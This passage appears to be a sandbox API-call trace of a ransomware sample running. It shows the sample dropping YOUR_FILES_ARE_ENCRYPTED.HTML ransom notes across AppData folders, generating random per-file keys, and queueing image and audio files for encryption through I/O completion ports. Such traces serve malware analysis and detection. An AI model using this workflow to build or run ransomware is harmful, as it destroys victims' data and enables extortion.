lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb26c000, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb26c000, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb26c000, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0165.635] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0165.635] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 92 [0165.635] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\word\\startup\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0165.636] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0165.638] CloseHandle (hObject=0x5e4) returned 1 [0165.638] GetProcessHeap () returned 0x270000 [0165.640] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0165.640] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb26c000, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb26c000, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb26c000, ftLastWriteTime.dwHighDateTime=0x1d709b9, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="STARTUP", cAlternateFileName="")) returned 0 [0165.640] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0165.640] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 84 [0165.640] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Word\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\word\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0165.640] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0165.643] CloseHandle (hObject=0x5b8) returned 1 [0165.643] GetProcessHeap () returned 0x270000 [0165.644] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0165.644] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb26c000, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb26c000, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb26c000, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName="Word", cAlternateFileName="")) returned 0 [0165.644] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0165.644] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 79 [0165.644] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0165.645] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0165.647] CloseHandle (hObject=0x598) returned 1 [0165.648] GetProcessHeap () returned 0x270000 [0165.649] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0165.653] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x94e0d3e0, ftCreationTime.dwHighDateTime=0x1d7e1ed, ftLastAccessTime.dwLowDateTime=0x97a15400, ftLastAccessTime.dwHighDateTime=0x1d7e4cd, ftLastWriteTime.dwLowDateTime=0x97a15400, ftLastWriteTime.dwHighDateTime=0x1d7e4cd, nFileSizeHigh=0x0, nFileSizeLow=0x6187, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="ndlbiyE.jpg", cAlternateFileName="")) returned 1 [0165.653] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ndlbiyE.jpg") returned 51 [0165.653] lstrcmpW (lpString1="ndlbiyE.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.653] PathFindExtensionW (pszPath="ndlbiyE.jpg") returned=".jpg" [0165.653] lstrlenW (lpString=".jpg") returned 4 [0165.653] PathFindExtensionW (pszPath="ndlbiyE.jpg") returned=".jpg" [0165.653] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, 
RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0165.653] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ndlbiyE.jpg" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\ndlbiye.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0165.654] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=24967) returned 1 [0165.654] GetProcessHeap () returned 0x270000 [0165.654] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0165.657] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="64") returned 2 [0165.657] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="6A") returned 2 [0165.657] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="93") returned 2 [0165.657] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="09") returned 2 [0165.657] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="FC") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="98") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="04") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="5B") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="8C") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="A1") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="21") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="A9") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="38") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="27") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | 
out: param_1="2D") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="C8") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="B0") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="BE") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="05") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="FC") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="88") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="11") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="53") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="15") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="E4") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="97") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="90") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="63") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="71") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="0D") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="30") returned 2 [0165.658] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="63") returned 2 [0165.659] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ndlbiyE.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ndlbiyE.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ndlbiyE.jpg" [0165.659] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, 
NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.659] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0165.659] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2b3635c0, ftCreationTime.dwHighDateTime=0x1d7da54, ftLastAccessTime.dwLowDateTime=0x6013b8d0, ftLastAccessTime.dwHighDateTime=0x1d7dd01, ftLastWriteTime.dwLowDateTime=0x6013b8d0, ftLastWriteTime.dwHighDateTime=0x1d7dd01, nFileSizeHigh=0x0, nFileSizeLow=0xd106, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="NdW9Nqmyx.bmp", cAlternateFileName="NDW9NQ~1.BMP")) returned 1 [0165.659] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\NdW9Nqmyx.bmp") returned 53 [0165.659] lstrcmpW (lpString1="NdW9Nqmyx.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.659] PathFindExtensionW (pszPath="NdW9Nqmyx.bmp") returned=".bmp" [0165.659] lstrlenW (lpString=".bmp") returned 4 [0165.659] PathFindExtensionW (pszPath="NdW9Nqmyx.bmp") returned=".bmp" [0165.659] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cb2c3c0, ftCreationTime.dwHighDateTime=0x1d7d71e, ftLastAccessTime.dwLowDateTime=0xfeefce20, ftLastAccessTime.dwHighDateTime=0x1d7db59, ftLastWriteTime.dwLowDateTime=0xfeefce20, ftLastWriteTime.dwHighDateTime=0x1d7db59, nFileSizeHigh=0x0, nFileSizeLow=0x13fc6, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Nt0kouwsI.jpg", cAlternateFileName="NT0KOU~1.JPG")) returned 1 [0165.659] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Nt0kouwsI.jpg") returned 53 [0165.659] lstrcmpW (lpString1="Nt0kouwsI.jpg", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.659] PathFindExtensionW (pszPath="Nt0kouwsI.jpg") returned=".jpg" [0165.659] lstrlenW (lpString=".jpg") returned 4 [0165.660] PathFindExtensionW (pszPath="Nt0kouwsI.jpg") returned=".jpg" [0165.660] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0165.660] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Nt0kouwsI.jpg" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\nt0kouwsi.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0165.660] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=81862) returned 1 [0165.660] GetProcessHeap () returned 0x270000 [0165.660] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0165.664] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="1C") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="52") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="3A") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="7B") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="AF") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="D4") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="09") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="88") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="E6") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="96") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="7F") returned 2 [0165.664] wsprintfW (in: 
param_1=0x4ebda62, param_2="%02X" | out: param_1="D3") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="D8") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="84") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="17") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="BA") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="4C") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="D8") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="37") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="F4") returned 2 [0165.665] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="95") returned 2 [0165.665] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="28") returned 2 [0165.665] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="8E") returned 2 [0165.665] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="0E") returned 2 [0165.665] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="98") returned 2 [0165.665] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="19") returned 2 [0165.665] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="A2") returned 2 [0165.665] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="12") returned 2 [0165.665] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="BA") returned 2 [0165.665] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="7D") returned 2 [0165.665] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="33") returned 2 [0165.665] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="2A") returned 2 [0165.665] lstrcpyW (in: lpString1=0x76a00bc, 
lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Nt0kouwsI.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Nt0kouwsI.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Nt0kouwsI.jpg" [0165.665] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.666] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0165.666] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87308f80, ftCreationTime.dwHighDateTime=0x1d7d9df, ftLastAccessTime.dwLowDateTime=0x920ec090, ftLastAccessTime.dwHighDateTime=0x1d7df5a, ftLastWriteTime.dwLowDateTime=0x920ec090, ftLastWriteTime.dwHighDateTime=0x1d7df5a, nFileSizeHigh=0x0, nFileSizeLow=0x14e60, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Oz2eLzn.mp3", cAlternateFileName="")) returned 1 [0165.666] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Oz2eLzn.mp3") returned 51 [0165.666] lstrcmpW (lpString1="Oz2eLzn.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.666] PathFindExtensionW (pszPath="Oz2eLzn.mp3") returned=".mp3" [0165.666] lstrlenW (lpString=".mp3") returned 4 [0165.666] PathFindExtensionW (pszPath="Oz2eLzn.mp3") returned=".mp3" [0165.666] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0165.666] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Oz2eLzn.mp3" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\oz2elzn.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e4 [0165.666] 
GetFileSizeEx (in: hFile=0x5e4, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=85600) returned 1 [0165.666] GetProcessHeap () returned 0x270000 [0165.666] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0165.670] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="87") returned 2 [0165.670] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="DB") returned 2 [0165.670] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="42") returned 2 [0165.670] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="88") returned 2 [0165.670] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="DA") returned 2 [0165.670] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="30") returned 2 [0165.670] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="8E") returned 2 [0165.670] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="8F") returned 2 [0165.670] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="8C") returned 2 [0165.670] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="15") returned 2 [0165.670] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="B3") returned 2 [0165.670] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="A0") returned 2 [0165.670] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="D7") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="0C") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="35") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="AB") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="71") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="5D") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="9C") returned 2 [0165.671] 
wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="71") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="A2") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="1D") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="AA") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="EF") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="F9") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="FD") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="07") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="87") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="43") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="74") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="66") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="6C") returned 2 [0165.672] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Oz2eLzn.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Oz2eLzn.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Oz2eLzn.mp3" [0165.672] CreateIoCompletionPort (FileHandle=0x5e4, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.672] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0165.677] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x88b83c80, ftCreationTime.dwHighDateTime=0x1d7da85, 
ftLastAccessTime.dwLowDateTime=0x5c1a7d40, ftLastAccessTime.dwHighDateTime=0x1d7dab3, ftLastWriteTime.dwLowDateTime=0x5c1a7d40, ftLastWriteTime.dwHighDateTime=0x1d7dab3, nFileSizeHigh=0x0, nFileSizeLow=0xc1b1, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="qoQusl.m4a", cAlternateFileName="")) returned 1 [0165.682] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\qoQusl.m4a") returned 50 [0165.682] lstrcmpW (lpString1="qoQusl.m4a", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.682] PathFindExtensionW (pszPath="qoQusl.m4a") returned=".m4a" [0165.682] lstrlenW (lpString=".m4a") returned 4 [0165.682] PathFindExtensionW (pszPath="qoQusl.m4a") returned=".m4a" [0165.682] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0165.682] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\qoQusl.m4a" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\qoqusl.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e4 [0165.682] GetFileSizeEx (in: hFile=0x5e4, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=49585) returned 1 [0165.682] GetProcessHeap () returned 0x270000 [0165.682] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0165.683] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="13") returned 2 [0165.683] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="D7") returned 2 [0165.683] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="72") returned 2 [0165.683] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="7B") returned 2 [0165.683] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="D4") returned 2 [0165.683] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: 
param_1="96") returned 2 [0165.683] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="1A") returned 2 [0165.683] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="CF") returned 2 [0165.683] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="26") returned 2 [0165.683] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="BC") returned 2 [0165.683] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="C6") returned 2 [0165.683] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="3E") returned 2 [0165.683] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="1A") returned 2 [0165.683] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="9A") returned 2 [0165.683] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="27") returned 2 [0165.683] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="F4") returned 2 [0165.684] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="16") returned 2 [0165.684] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="F5") returned 2 [0165.684] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="5D") returned 2 [0165.684] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="C5") returned 2 [0165.684] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="EE") returned 2 [0165.684] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="32") returned 2 [0165.684] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="7E") 